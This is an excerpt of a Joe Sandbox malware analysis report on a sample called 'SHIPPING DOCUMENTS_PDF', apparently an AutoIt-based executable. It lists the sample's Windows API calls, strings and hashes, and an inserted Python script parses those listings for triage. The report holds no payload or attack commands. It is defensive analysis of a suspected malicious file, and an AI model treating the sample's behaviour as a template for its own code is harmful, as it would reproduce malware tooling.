                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                    • API String ID: 1038674560-1810252412
                                                                                    • Opcode ID: ad97e92fd524f73cbe217255e60500701c6bd85379f01b0b0f3f82589802f3e4
                                                                                    • Instruction ID: ac64a3d0f356a9190a0e4b0efee890ee15e6f65d07596f9b7f0bbc12e1f18b1d
                                                                                    • Opcode Fuzzy Hash: ad97e92fd524f73cbe217255e60500701c6bd85379f01b0b0f3f82589802f3e4
                                                                                    • Instruction Fuzzy Hash: 8D317231B4C209AADA18FB50DE53FAE77E8DB11B21F2005E9B856710D1FF516F08D662
                                                                                    APIs
                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00BC5013
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00BC501E
                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00BC5029
                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00BC5034
                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00BC503F
                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00BC504A
                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00BC5055
                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00BC5060
                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00BC506B
                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00BC5076
                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00BC5081
                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00BC508C
                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00BC5097
                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00BC50A2
                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00BC50AD
                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00BC50B8
                                                                                    • GetCursorInfo.USER32(?), ref: 00BC50C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$Load$Info
                                                                                    • String ID:
                                                                                    • API String ID: 2577412497-0
                                                                                    • Opcode ID: ddcaf1cf5ce3062ab4695065f6c95c1c83b374d2dd5ebd8bf15257bf9626b15c
                                                                                    • Instruction ID: 6db2ca095b6768acc542fa88487ca5a28ad0943e043decabe727b121577d9007
                                                                                    • Opcode Fuzzy Hash: ddcaf1cf5ce3062ab4695065f6c95c1c83b374d2dd5ebd8bf15257bf9626b15c
                                                                                    • Instruction Fuzzy Hash: 6131F4B1D4831A6ADF209FB68C89D6FBFE8FF04750F50456AA50DE7280DA786540CF91
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BDA259
                                                                                    • DestroyWindow.USER32(?,?), ref: 00BDA2D3
                                                                                      • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BDA34D
                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BDA36F
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BDA382
                                                                                    • DestroyWindow.USER32(00000000), ref: 00BDA3A4
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B50000,00000000), ref: 00BDA3DB
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BDA3F4
                                                                                    • GetDesktopWindow.USER32 ref: 00BDA40D
                                                                                    • GetWindowRect.USER32(00000000), ref: 00BDA414
                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BDA42C
                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BDA444
                                                                                      • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                    • String ID: 0$tooltips_class32
                                                                                    • API String ID: 1297703922-3619404913
                                                                                    • Opcode ID: 891c7466b156d5dee7b78dfd46489d34dfb5cf5a3de6ebd7643af8cc640422d5
                                                                                    • Instruction ID: 1d9a22c4184d89284d63ee358727484512a5e7cd9c47efdd0b653584138e15dc
                                                                                    • Opcode Fuzzy Hash: 891c7466b156d5dee7b78dfd46489d34dfb5cf5a3de6ebd7643af8cc640422d5
                                                                                    • Instruction Fuzzy Hash: AB719070144206AFD725CF18CC59FAAB7E9FB89300F04456EF985873A1EBB4E906CB52
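The "APIs" entries in these function listings follow one fixed shape: `Name.MODULE(arg,arg,...), ref: ADDRESS`, with indirect calls prefixed by `Part of subcall function ADDRESS:`, and raw hex window-message numbers in the `SendMessageW` arguments (the tooltip function above sends 0x433, 0x432, 0x418 and 0x421). The following is an added example of turning such a listing into structured records for triage; it is not Joe Sandbox code. The sample input is copied from the tooltip function listed above, and the window-message table is a partial one I supply from the Win32 headers (WM_USER is 0x400, the TTM_* messages are WM_USER plus an offset); it covers only the messages that appear in this report section.

```python
"""Parse Joe Sandbox 'APIs' entries into records and name the raw window messages."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Shapes handled (all taken from the listing format of this report):
#   • LoadCursorW.USER32(00000000,00007F8A), ref: 00BC5013
#   • __swprintf.LIBCMT ref: 00BAA51B                      (no argument list)
#   • GetDesktopWindow.USER32 ref: 00BDA40D
#     • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
_ENTRY = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w@$?]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Partial window-message table, supplied by me from the Win32 headers.
WINDOW_MESSAGES = {
    0x0030: "WM_SETFONT",
    0x00B0: "EM_GETSEL",
    0x00B1: "EM_SETSEL",
    0x00C2: "EM_REPLACESEL",
    0x0233: "WM_DROPFILES",
    0x0418: "TTM_SETMAXTIPWIDTH",
    0x0421: "TTM_SETTITLEW",
    0x0432: "TTM_ADDTOOLW",
    0x0433: "TTM_DELTOOLW",
}

# Constructed sample: the tooltip function's entries as printed in this report.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 00BDA259
• DestroyWindow.USER32(?,?), ref: 00BDA2D3
  • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BDA34D
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BDA36F
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BDA382
• GetDesktopWindow.USER32 ref: 00BDA40D
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BDA42C
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BDA444
  • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
Strings
"""


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple            # arguments as printed; '?' means the sandbox could not resolve it
    ref: int               # address of the call site
    subcall_of: Optional[int]  # callee address when the API is reached through a subcall


def parse_api_entries(text: str) -> list:
    """Return one ApiCall per bullet line; headings and unrelated lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _ENTRY.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = tuple(a.strip() for a in raw_args.split(",")) if raw_args else ()
        sub = m.group("sub")
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def message_name(call: ApiCall) -> Optional[str]:
    """For SendMessageW(hwnd, msg, ...) give the symbolic name of msg when it is known."""
    if call.name != "SendMessageW" or len(call.args) < 2:
        return None
    try:
        return WINDOW_MESSAGES.get(int(call.args[1], 16))
    except ValueError:  # message argument printed as '?'
        return None


def summarize(calls: list) -> dict:
    """Per-module counts, distinct APIs and named messages for the direct calls only."""
    direct = [c for c in calls if c.subcall_of is None]
    return {
        "modules": dict(Counter(c.module for c in direct)),
        "apis": sorted({c.name for c in direct}),
        "messages": sorted({message_name(c) for c in direct} - {None}),
        "subcall_count": len(calls) - len(direct),
    }


if __name__ == "__main__":
    for call in parse_api_entries(SAMPLE):
        print(f"{call.ref:08X} {call.module}!{call.name} {message_name(call) or ''}")
    print(summarize(parse_api_entries(SAMPLE)))
```

Subcall entries are kept but separated from direct calls in the summary, because the report prints them under every caller and counting them again inflates the API profile of each function.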
                                                                                    APIs
                                                                                      • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00BDC627
                                                                                      • Part of subcall function 00BDAB37: ClientToScreen.USER32(?,?), ref: 00BDAB60
                                                                                      • Part of subcall function 00BDAB37: GetWindowRect.USER32(?,?), ref: 00BDABD6
                                                                                      • Part of subcall function 00BDAB37: PtInRect.USER32(?,?,00BDC014), ref: 00BDABE6
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00BDC690
                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00BDC69B
                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00BDC6BE
                                                                                    • _wcscat.LIBCMT ref: 00BDC6EE
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00BDC705
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00BDC71E
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00BDC735
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00BDC757
                                                                                    • DragFinish.SHELL32(?), ref: 00BDC75E
                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00BDC851
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                    • API String ID: 169749273-3440237614
                                                                                    • Opcode ID: 0735ad26802d35070febb4ddba602bea8548de241874249f95de6f1696b9224e
                                                                                    • Instruction ID: 968dd062ef46fc255852b41928ddc9391b34680786a4e587bffaa44d6794cb34
                                                                                    • Opcode Fuzzy Hash: 0735ad26802d35070febb4ddba602bea8548de241874249f95de6f1696b9224e
                                                                                    • Instruction Fuzzy Hash: 1D617D71508301AFC701DF64DC95EAFBBE8EF89310F00496EF595972A1EB309A49CB52
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00BD4424
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BD446F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                    • API String ID: 3974292440-4258414348
                                                                                    • Opcode ID: b397b8ca41c5c84b651470f64178714594b43e6714e42217e3b6a97d1f0194c6
                                                                                    • Instruction ID: 49448f248c2aadb034b4836a6324bff21b9bc9610f99dbe560281e6a3b4c5dcd
                                                                                    • Opcode Fuzzy Hash: b397b8ca41c5c84b651470f64178714594b43e6714e42217e3b6a97d1f0194c6
                                                                                    • Instruction Fuzzy Hash: F5915D746047019FCB04EF10C852A6EB7E1EF95754F0488EAF8965B3A2DB30ED49CB81
                                                                                    APIs
                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00BDB8B4
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00BD91C2), ref: 00BDB910
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BDB949
                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00BDB98C
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BDB9C3
                                                                                    • FreeLibrary.KERNEL32(?), ref: 00BDB9CF
                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BDB9DF
                                                                                    • DestroyIcon.USER32(?,?,?,?,?,00BD91C2), ref: 00BDB9EE
                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BDBA0B
                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BDBA17
                                                                                      • Part of subcall function 00B72EFD: __wcsicmp_l.LIBCMT ref: 00B72F86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                    • String ID: .dll$.exe$.icl
                                                                                    • API String ID: 1212759294-1154884017
                                                                                    • Opcode ID: 3f8a58bba4c87d562627194a13f69d392e08cc290a3a76527006714ab2d24531
                                                                                    • Instruction ID: df61ef2f7aee538b5d68982084b2f1be7b8057792ae7e829c82956c8e67315df
                                                                                    • Opcode Fuzzy Hash: 3f8a58bba4c87d562627194a13f69d392e08cc290a3a76527006714ab2d24531
                                                                                    • Instruction Fuzzy Hash: DF61DF71900219FAEB14DF64CC51FBEBBE8EB08721F108596F915D62C1EB749A80DBA0
                                                                                    APIs
                                                                                    • GetLocalTime.KERNEL32(?), ref: 00BBDCDC
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BBDCEC
                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BBDCF8
                                                                                    • __wsplitpath.LIBCMT ref: 00BBDD56
                                                                                    • _wcscat.LIBCMT ref: 00BBDD6E
                                                                                    • _wcscat.LIBCMT ref: 00BBDD80
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BBDD95
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBDDA9
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBDDDB
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBDDFC
                                                                                    • _wcscpy.LIBCMT ref: 00BBDE08
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00BBDE47
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                    • String ID: *.*
                                                                                    • API String ID: 3566783562-438819550
                                                                                    • Opcode ID: f7dcc18c08366e51e1f1770027fc305a8e267c62122d8e384dfa582e5ef3d156
                                                                                    • Instruction ID: 994fb4ebb69cabf2d0d4394de1bfff886d1c3850f09f126f8f377717f2dcaf56
                                                                                    • Opcode Fuzzy Hash: f7dcc18c08366e51e1f1770027fc305a8e267c62122d8e384dfa582e5ef3d156
                                                                                    • Instruction Fuzzy Hash: A3616E725042059FCB10EF20C844AEEB7E8FF89314F0489AEF99997251EB75E945CB52
                                                                                    APIs
                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00BB9C7F
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00BB9CA0
                                                                                    • __swprintf.LIBCMT ref: 00BB9CF9
                                                                                    • __swprintf.LIBCMT ref: 00BB9D12
                                                                                    • _wprintf.LIBCMT ref: 00BB9DB9
                                                                                    • _wprintf.LIBCMT ref: 00BB9DD7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                    • API String ID: 311963372-3080491070
                                                                                    • Opcode ID: 4ea14e2d648fe717d069d269136df1d522fe6dfa734fa79ea6cf48bd0abb54bf
                                                                                    • Instruction ID: b800b345b3904368c4d390d13f0b8a16e5dfa948eb5e84552253f39aa4f9cc7c
                                                                                    • Opcode Fuzzy Hash: 4ea14e2d648fe717d069d269136df1d522fe6dfa734fa79ea6cf48bd0abb54bf
                                                                                    • Instruction Fuzzy Hash: C0518E72940509AACB15EBE0DD56FEEB7B8EF14301F1040E5B905720A2EF712E59DB60
                                                                                    APIs
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00BBA3CB
                                                                                    • GetDriveTypeW.KERNEL32 ref: 00BBA418
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BBA460
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BBA497
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BBA4C5
                                                                                      • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                    • API String ID: 2698844021-4113822522
                                                                                    • Opcode ID: fde07920b98bbf6e726c1fed782dc8cb2243705740f20720eb48ebe8e62f4599
                                                                                    • Instruction ID: 47cadb547917e516cbcea960a0b7b7f6b61ea9cc3ce15bdd23ae4cbcb82cbe99
                                                                                    • Opcode Fuzzy Hash: fde07920b98bbf6e726c1fed782dc8cb2243705740f20720eb48ebe8e62f4599
                                                                                    • Instruction Fuzzy Hash: B2516E716087059FC700EF10C89196AB7F8FF98759F1088ADF89A572A1DB71ED0ACB52
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00B8E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00BAF8DF
                                                                                    • LoadStringW.USER32(00000000,?,00B8E029,00000001), ref: 00BAF8E8
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00C15310,?,00000FFF,?,?,00B8E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00BAF90A
                                                                                    • LoadStringW.USER32(00000000,?,00B8E029,00000001), ref: 00BAF90D
                                                                                    • __swprintf.LIBCMT ref: 00BAF95D
                                                                                    • __swprintf.LIBCMT ref: 00BAF96E
                                                                                    • _wprintf.LIBCMT ref: 00BAFA17
                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BAFA2E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                    • API String ID: 984253442-2268648507
                                                                                    • Opcode ID: ddf13f7e06bc66fd1a194a8e8d69f772ce2a2952477b03a2668c1f9b4e10bcae
                                                                                    • Instruction ID: f327d0e2149f940294675f37ced9e3ad1fd5ac28b1bceea016ff6445651bc14f
                                                                                    • Opcode Fuzzy Hash: ddf13f7e06bc66fd1a194a8e8d69f772ce2a2952477b03a2668c1f9b4e10bcae
                                                                                    • Instruction Fuzzy Hash: BB413D72944209AACB15EBE0DD96EFEB7B8EF19301F1040E5B905760A2EE355F0DCA61
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00BD9207,?,?), ref: 00BDBA56
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBA6D
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBA78
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBA85
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00BDBA8E
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBA9D
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00BDBAA6
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBAAD
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBABE
                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00BE2CAC,?), ref: 00BDBAD7
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00BDBAE7
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00BDBB0B
                                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00BDBB36
                                                                                    • DeleteObject.GDI32(00000000), ref: 00BDBB5E
                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00BDBB74
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
